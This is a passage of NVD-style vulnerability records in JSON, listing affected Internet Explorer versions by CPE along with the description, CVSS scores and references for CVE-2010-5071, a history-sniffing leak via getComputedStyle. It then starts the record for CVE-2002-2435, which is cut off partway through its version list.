"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.3800:*:*:*:*:*:*:*",
"matchCriteriaId": "8C07C1A9-1A94-4653-8C57-6FCFC25854E4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.6307:*:*:*:*:*:*:*",
"matchCriteriaId": "EDC57519-AD96-4ECF-A5B2-4E45F7D55298",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2920.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "37DE3DE6-A355-41F2-BF5E-E7526449E753",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3103.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "5DB24B4F-44FF-4F0F-90FA-240A34B9599F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3105.0106:*:*:*:*:*:*:*",
"matchCriteriaId": "919A6551-DB18-49BD-AB92-4C453B3B728F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3314.2101:*:*:*:*:*:*:*",
"matchCriteriaId": "C512DAB3-2720-42D2-B27E-28F30FE0FE46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3315.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "CB90458F-1F2B-4F4C-88C6-4B670787D126",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3502.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "6C2EFDB4-97C2-4DDF-8A65-FCFB60FCB540",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3700.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "4A99CDC7-9341-4DFB-BB18-FF06C05FF9B0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"matchCriteriaId": "6219D36E-9E2C-4DC7-8FD5-FAD144A333F6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B1CFF390-FF33-45CA-BC96-C6766491C616",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "3BFFB565-F656-43E3-89E1-E412DC4C9D41",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp2:*:*:*:*:*:*",
"matchCriteriaId": "BD3A3282-8842-4708-AF7B-0AFBEB5D4F9A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp3:*:*:*:*:*:*",
"matchCriteriaId": "F4336F0E-75FE-4592-9D98-4F689804956E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp4:*:*:*:*:*:*",
"matchCriteriaId": "F3F2A51E-2675-4993-B9C2-F2D176A92857",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "DA6E5E4B-9E95-4019-8622-6E707FEC2FF6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "40F8042F-C621-45AE-9F8C-70469579643A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:preview:*:*:*:*:*:*",
"matchCriteriaId": "8E93C22E-812E-4CDA-9850-2386CE1E817A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2CD04E07-3664-4D4F-BF3E-6B33AF0F2D12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp2:*:*:*:*:*:*",
"matchCriteriaId": "D05ED9D0-CF78-4FAD-9371-6FB3D5825148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.3825.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "8BA6BA38-8B3B-4B9A-95BF-BCD412DD83B6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4030.2400:*:*:*:*:*:*:*",
"matchCriteriaId": "01BD2A05-3FCE-4C5D-8228-968630F27E28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0100:*:*:*:*:*:*:*",
"matchCriteriaId": "4430779C-C678-4950-AE9E-82CDFC1A08D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0600:*:*:*:*:*:*:*",
"matchCriteriaId": "BF0EC334-AEAD-43CA-A609-C027060F4F20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4308.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "BAF320BE-F022-4E0E-9815-B8AEED87B384",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4522.1800:*:*:*:*:*:*:*",
"matchCriteriaId": "75532B2D-6814-4D20-8AEB-E7DFD66B6423",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4807.2300:*:*:*:*:*:*:*",
"matchCriteriaId": "83802E30-8E7D-4CAB-B8FC-10056CF833D6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*",
"matchCriteriaId": "693D3C1C-E3E4-49DB-9A13-44ADDFF82507",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"matchCriteriaId": "D47247A3-7CD7-4D67-9D9B-A94A504DA1BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A19F6133-25D1-44A5-B6B9-354703436783",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2462.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "314538E8-48EC-4869-9074-2A1F5B7CBB3C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2479.0006:*:*:*:*:*:*:*",
"matchCriteriaId": "F56B3A72-7C5E-4F0C-BBC7-AA13DDFBEE70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"matchCriteriaId": "68656E52-AD8A-474E-9160-CD5F8857254B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2600.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "6876CE89-AA70-44C5-8A69-E2ED7A63F570",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"matchCriteriaId": "93F47C82-E767-47A8-88DE-417B004ED7FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "F86E7189-CE21-4007-A3FA-39A6B51A5AB9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE2555F-C4BE-482F-8DD9-976D2026058C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "7B90EA4B-DA10-44B7-BD3D-6AE1197212D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "61F352FE-C22E-4B33-A46F-77A164B5DABB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3663.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "5ACD5A44-0926-4A1B-9900-1E7CC0A561C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3718.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "196CEE37-2E3A-41A7-9AC1-0D5CC3F35D8F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "3E16BEF4-71AA-4E23-B438-D25FFABDB646",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.1830:*:*:*:*:*:*:*",
"matchCriteriaId": "1F32702E-F955-4DDB-B235-7C47E882453C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.3959:*:*:*:*:*:*:*",
"matchCriteriaId": "6FA2B4AD-C04D-4A6B-8570-5A2F5489F750",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*",
"matchCriteriaId": "1A33FA7F-BB2A-4C66-B608-72997A2BD1DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6BC71FD8-D385-4507-BD14-B75FDD4C79E6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta:*:*:*:*:*:*",
"matchCriteriaId": "506711D9-6E57-4EED-8628-36C7F2324040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "ED471260-0272-431F-A91E-AC2883D92497",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "63D18070-EC48-4904-9AE0-558F7F3B869D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "86584E3F-3B0D-4018-A186-E59F3B01CA5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730:unknown:gold:*:*:*:*:*",
"matchCriteriaId": "817636ED-5E42-460E-89F1-24D5C64AB8BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730.11:*:*:*:*:*:*:*",
"matchCriteriaId": "0E6E1020-1017-4670-9316-27C79F1E2698",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.5730.1100:*:*:*:*:*:*:*",
"matchCriteriaId": "37F63AE1-8FC9-4C0F-8D19-F17DFA214E94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16386:*:*:*:*:*:*:*",
"matchCriteriaId": "35B1186A-FA5B-4E49-8C2F-BCD2D45F22A2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16441:*:*:*:*:*:*:*",
"matchCriteriaId": "53D75496-8594-44DB-B5C4-EA3CABD6551A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:*:*:*:*:*:*:*",
"matchCriteriaId": "5F709B61-F64B-4E8F-80BB-4944485B6125",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:beta:*:*:*:*:*:*",
"matchCriteriaId": "612B8367-DAEF-4EE3-BC57-16A5CF4D3030",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method."
},
{
"lang": "es",
"value": "La ejecuci\u00f3n de JavaScript en Microsoft Internet Explorer v8.0 y anteriores, no restringe adecuadamente el conjunto de valores contenidos en el objeto devuelto por el m\u00e9todo getComputedStyle, lo que permite a atacantes remotos obtener informaci\u00f3n sensible acerca de las p\u00e1ginas web visitadas por llamar a este m\u00e9todo."
}
],
"id": "CVE-2010-5071",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2011-12-07T19:55:01.470",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-264"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2002-2435
Vulnerability from fkie_nvd - Published: 2011-12-07 19:55 - Updated: 2025-04-11 00:51
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:7.0.6000.16711:*:*:*:*:*:*:*",
"matchCriteriaId": "77497F7F-1853-448A-8448-8FB6FA43169B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0.7600.16385:*:*:*:*:*:*:*",
"matchCriteriaId": "1B5A9719-9C14-4843-A6A9-CF4AF804B37D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0b:*:*:*:*:*:*:*",
"matchCriteriaId": "587DAAD1-F33D-41EB-B752-36B9D87FC19B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CB024757-60F3-44F9-BCFF-04B2F109D7A2",
"versionEndIncluding": "8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1BBF9241-A175-438C-A793-3D245BE2AE35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F62AC866-A06F-47DB-AEDF-E345CE0B14A4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "943D5C5C-FC49-4EDE-AE75-A79CFF42208E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "59EB6841-0427-479B-8771-06DF62EE3C87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "8873A08F-D4C7-46FC-8FE5-972644F85ADA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A5B815D9-BC21-4A17-AF00-B8AD181027D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "42502347-DD40-4F8C-9861-C0A88A3F8608",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "0AF9C64F-9A67-4BA9-A653-75507935E6EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "C375A9AA-505B-444C-A45F-2BAAD0B2CD0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:*:*:*:*:*:*:*",
"matchCriteriaId": "B9D82B89-456D-41CB-A894-B6A22FB4415D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "44FF4E47-AD75-42C7-BB84-42BBA46A58B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2E21CE6E-2B33-4225-B1DC-C19F1D578040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.5:*:*:*:*:*:*:*",
"matchCriteriaId": "1B26CE22-E730-4247-853E-5E640DB3ECB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.308:*:*:*:*:*:*:*",
"matchCriteriaId": "0A652453-AB5F-405C-ABDE-CE1B54FEACED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.520:*:*:*:*:*:*:*",
"matchCriteriaId": "141080AB-48DE-4885-BAB6-6F0937ABD49B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1155:*:*:*:*:*:*:*",
"matchCriteriaId": "EB758D76-B7F6-4E87-B88D-620443655CA9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1158:*:*:*:*:*:*:*",
"matchCriteriaId": "28655AC5-1512-4F45-9963-CA26F73981CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1215:*:*:*:*:*:*:*",
"matchCriteriaId": "C00F4F36-B88A-4FDB-BE52-83C6EF60BDB7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "BEC05584-F553-4D29-9C46-C9EE5F0CB166",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.544:*:*:*:*:*:*:*",
"matchCriteriaId": "B108A86E-8387-446C-B823-BE6FCAE747A5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1008.3:*:*:*:*:*:*:*",
"matchCriteriaId": "BA3F79B8-512A-4B88-868C-7C4ADFD223C9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1712.6:*:*:*:*:*:*:*",
"matchCriteriaId": "078C3A86-C9F8-4A19-9DDC-1065B54E640F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.2106.8:*:*:*:*:*:*:*",
"matchCriteriaId": "9030923C-356E-4FAB-8E64-03D462B4DB5F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3110.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DC0FFABC-8BED-4838-85FE-406DC9CF9B92",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3612.1713:*:*:*:*:*:*:*",
"matchCriteriaId": "C9DB4A00-4F70-4189-81BD-9318C52DF2D2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5:*:*:*:*:*:*:*",
"matchCriteriaId": "B4071D03-D955-4C1B-ACD8-A864F7D0FA02",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E6B8985B-B927-4928-B1DB-18E29F796992",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "3A04FEA6-37B0-44B0-844F-55652ABA1F85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "4D56FB8E-2553-47C1-82A2-9E59023780CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "8541EEED-94F4-42F8-9719-57F3EC85D52B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp3:*:*:*:*:*:*",
"matchCriteriaId": "40372520-08CF-4F64-A7AC-7E0AE0964138",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp4:*:*:*:*:*:*",
"matchCriteriaId": "2EB39B99-91A0-4B70-B12A-BA37F6AFBA83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0518.10:*:*:*:*:*:*:*",
"matchCriteriaId": "FBFE8C8E-F46C-4179-AE83-CE4720C8E0E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0910.1309:*:*:*:*:*:*:*",
"matchCriteriaId": "61125B09-23AA-4D5A-8332-6B5CCD80C7A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2014.0216:*:*:*:*:*:*:*",
"matchCriteriaId": "3AECF59F-B3C0-44CC-B77A-30E32B3E8BB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2314.1003:*:*:*:*:*:*:*",
"matchCriteriaId": "D4690B85-86B9-448E-9249-B3885DEDC60E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2516.1900:*:*:*:*:*:*:*",
"matchCriteriaId": "4E215C82-E4AD-4B87-92D8-DD4D486EB6EF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2614.3500:*:*:*:*:*:*:*",
"matchCriteriaId": "D91F4C80-3B1B-45BD-966F-C9DBF98B875D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.800:*:*:*:*:*:*:*",
"matchCriteriaId": "F65E0DC1-40F6-4252-945A-A972343D1E29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.3800:*:*:*:*:*:*:*",
"matchCriteriaId": "8C07C1A9-1A94-4653-8C57-6FCFC25854E4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.6307:*:*:*:*:*:*:*",
"matchCriteriaId": "EDC57519-AD96-4ECF-A5B2-4E45F7D55298",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2920.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "37DE3DE6-A355-41F2-BF5E-E7526449E753",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3103.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "5DB24B4F-44FF-4F0F-90FA-240A34B9599F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3105.0106:*:*:*:*:*:*:*",
"matchCriteriaId": "919A6551-DB18-49BD-AB92-4C453B3B728F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3314.2101:*:*:*:*:*:*:*",
"matchCriteriaId": "C512DAB3-2720-42D2-B27E-28F30FE0FE46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3315.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "CB90458F-1F2B-4F4C-88C6-4B670787D126",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3502.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "6C2EFDB4-97C2-4DDF-8A65-FCFB60FCB540",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3700.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "4A99CDC7-9341-4DFB-BB18-FF06C05FF9B0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"matchCriteriaId": "6219D36E-9E2C-4DC7-8FD5-FAD144A333F6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B1CFF390-FF33-45CA-BC96-C6766491C616",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "3BFFB565-F656-43E3-89E1-E412DC4C9D41",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp2:*:*:*:*:*:*",
"matchCriteriaId": "BD3A3282-8842-4708-AF7B-0AFBEB5D4F9A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp3:*:*:*:*:*:*",
"matchCriteriaId": "F4336F0E-75FE-4592-9D98-4F689804956E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp4:*:*:*:*:*:*",
"matchCriteriaId": "F3F2A51E-2675-4993-B9C2-F2D176A92857",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "DA6E5E4B-9E95-4019-8622-6E707FEC2FF6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "40F8042F-C621-45AE-9F8C-70469579643A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:preview:*:*:*:*:*:*",
"matchCriteriaId": "8E93C22E-812E-4CDA-9850-2386CE1E817A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2CD04E07-3664-4D4F-BF3E-6B33AF0F2D12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp2:*:*:*:*:*:*",
"matchCriteriaId": "D05ED9D0-CF78-4FAD-9371-6FB3D5825148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.3825.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "8BA6BA38-8B3B-4B9A-95BF-BCD412DD83B6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4030.2400:*:*:*:*:*:*:*",
"matchCriteriaId": "01BD2A05-3FCE-4C5D-8228-968630F27E28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0100:*:*:*:*:*:*:*",
"matchCriteriaId": "4430779C-C678-4950-AE9E-82CDFC1A08D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0600:*:*:*:*:*:*:*",
"matchCriteriaId": "BF0EC334-AEAD-43CA-A609-C027060F4F20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4308.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "BAF320BE-F022-4E0E-9815-B8AEED87B384",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4522.1800:*:*:*:*:*:*:*",
"matchCriteriaId": "75532B2D-6814-4D20-8AEB-E7DFD66B6423",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4807.2300:*:*:*:*:*:*:*",
"matchCriteriaId": "83802E30-8E7D-4CAB-B8FC-10056CF833D6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*",
"matchCriteriaId": "693D3C1C-E3E4-49DB-9A13-44ADDFF82507",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"matchCriteriaId": "D47247A3-7CD7-4D67-9D9B-A94A504DA1BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A19F6133-25D1-44A5-B6B9-354703436783",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2462.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "314538E8-48EC-4869-9074-2A1F5B7CBB3C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2479.0006:*:*:*:*:*:*:*",
"matchCriteriaId": "F56B3A72-7C5E-4F0C-BBC7-AA13DDFBEE70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"matchCriteriaId": "68656E52-AD8A-474E-9160-CD5F8857254B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2600.0000:*:*:*:*:*:*:*",
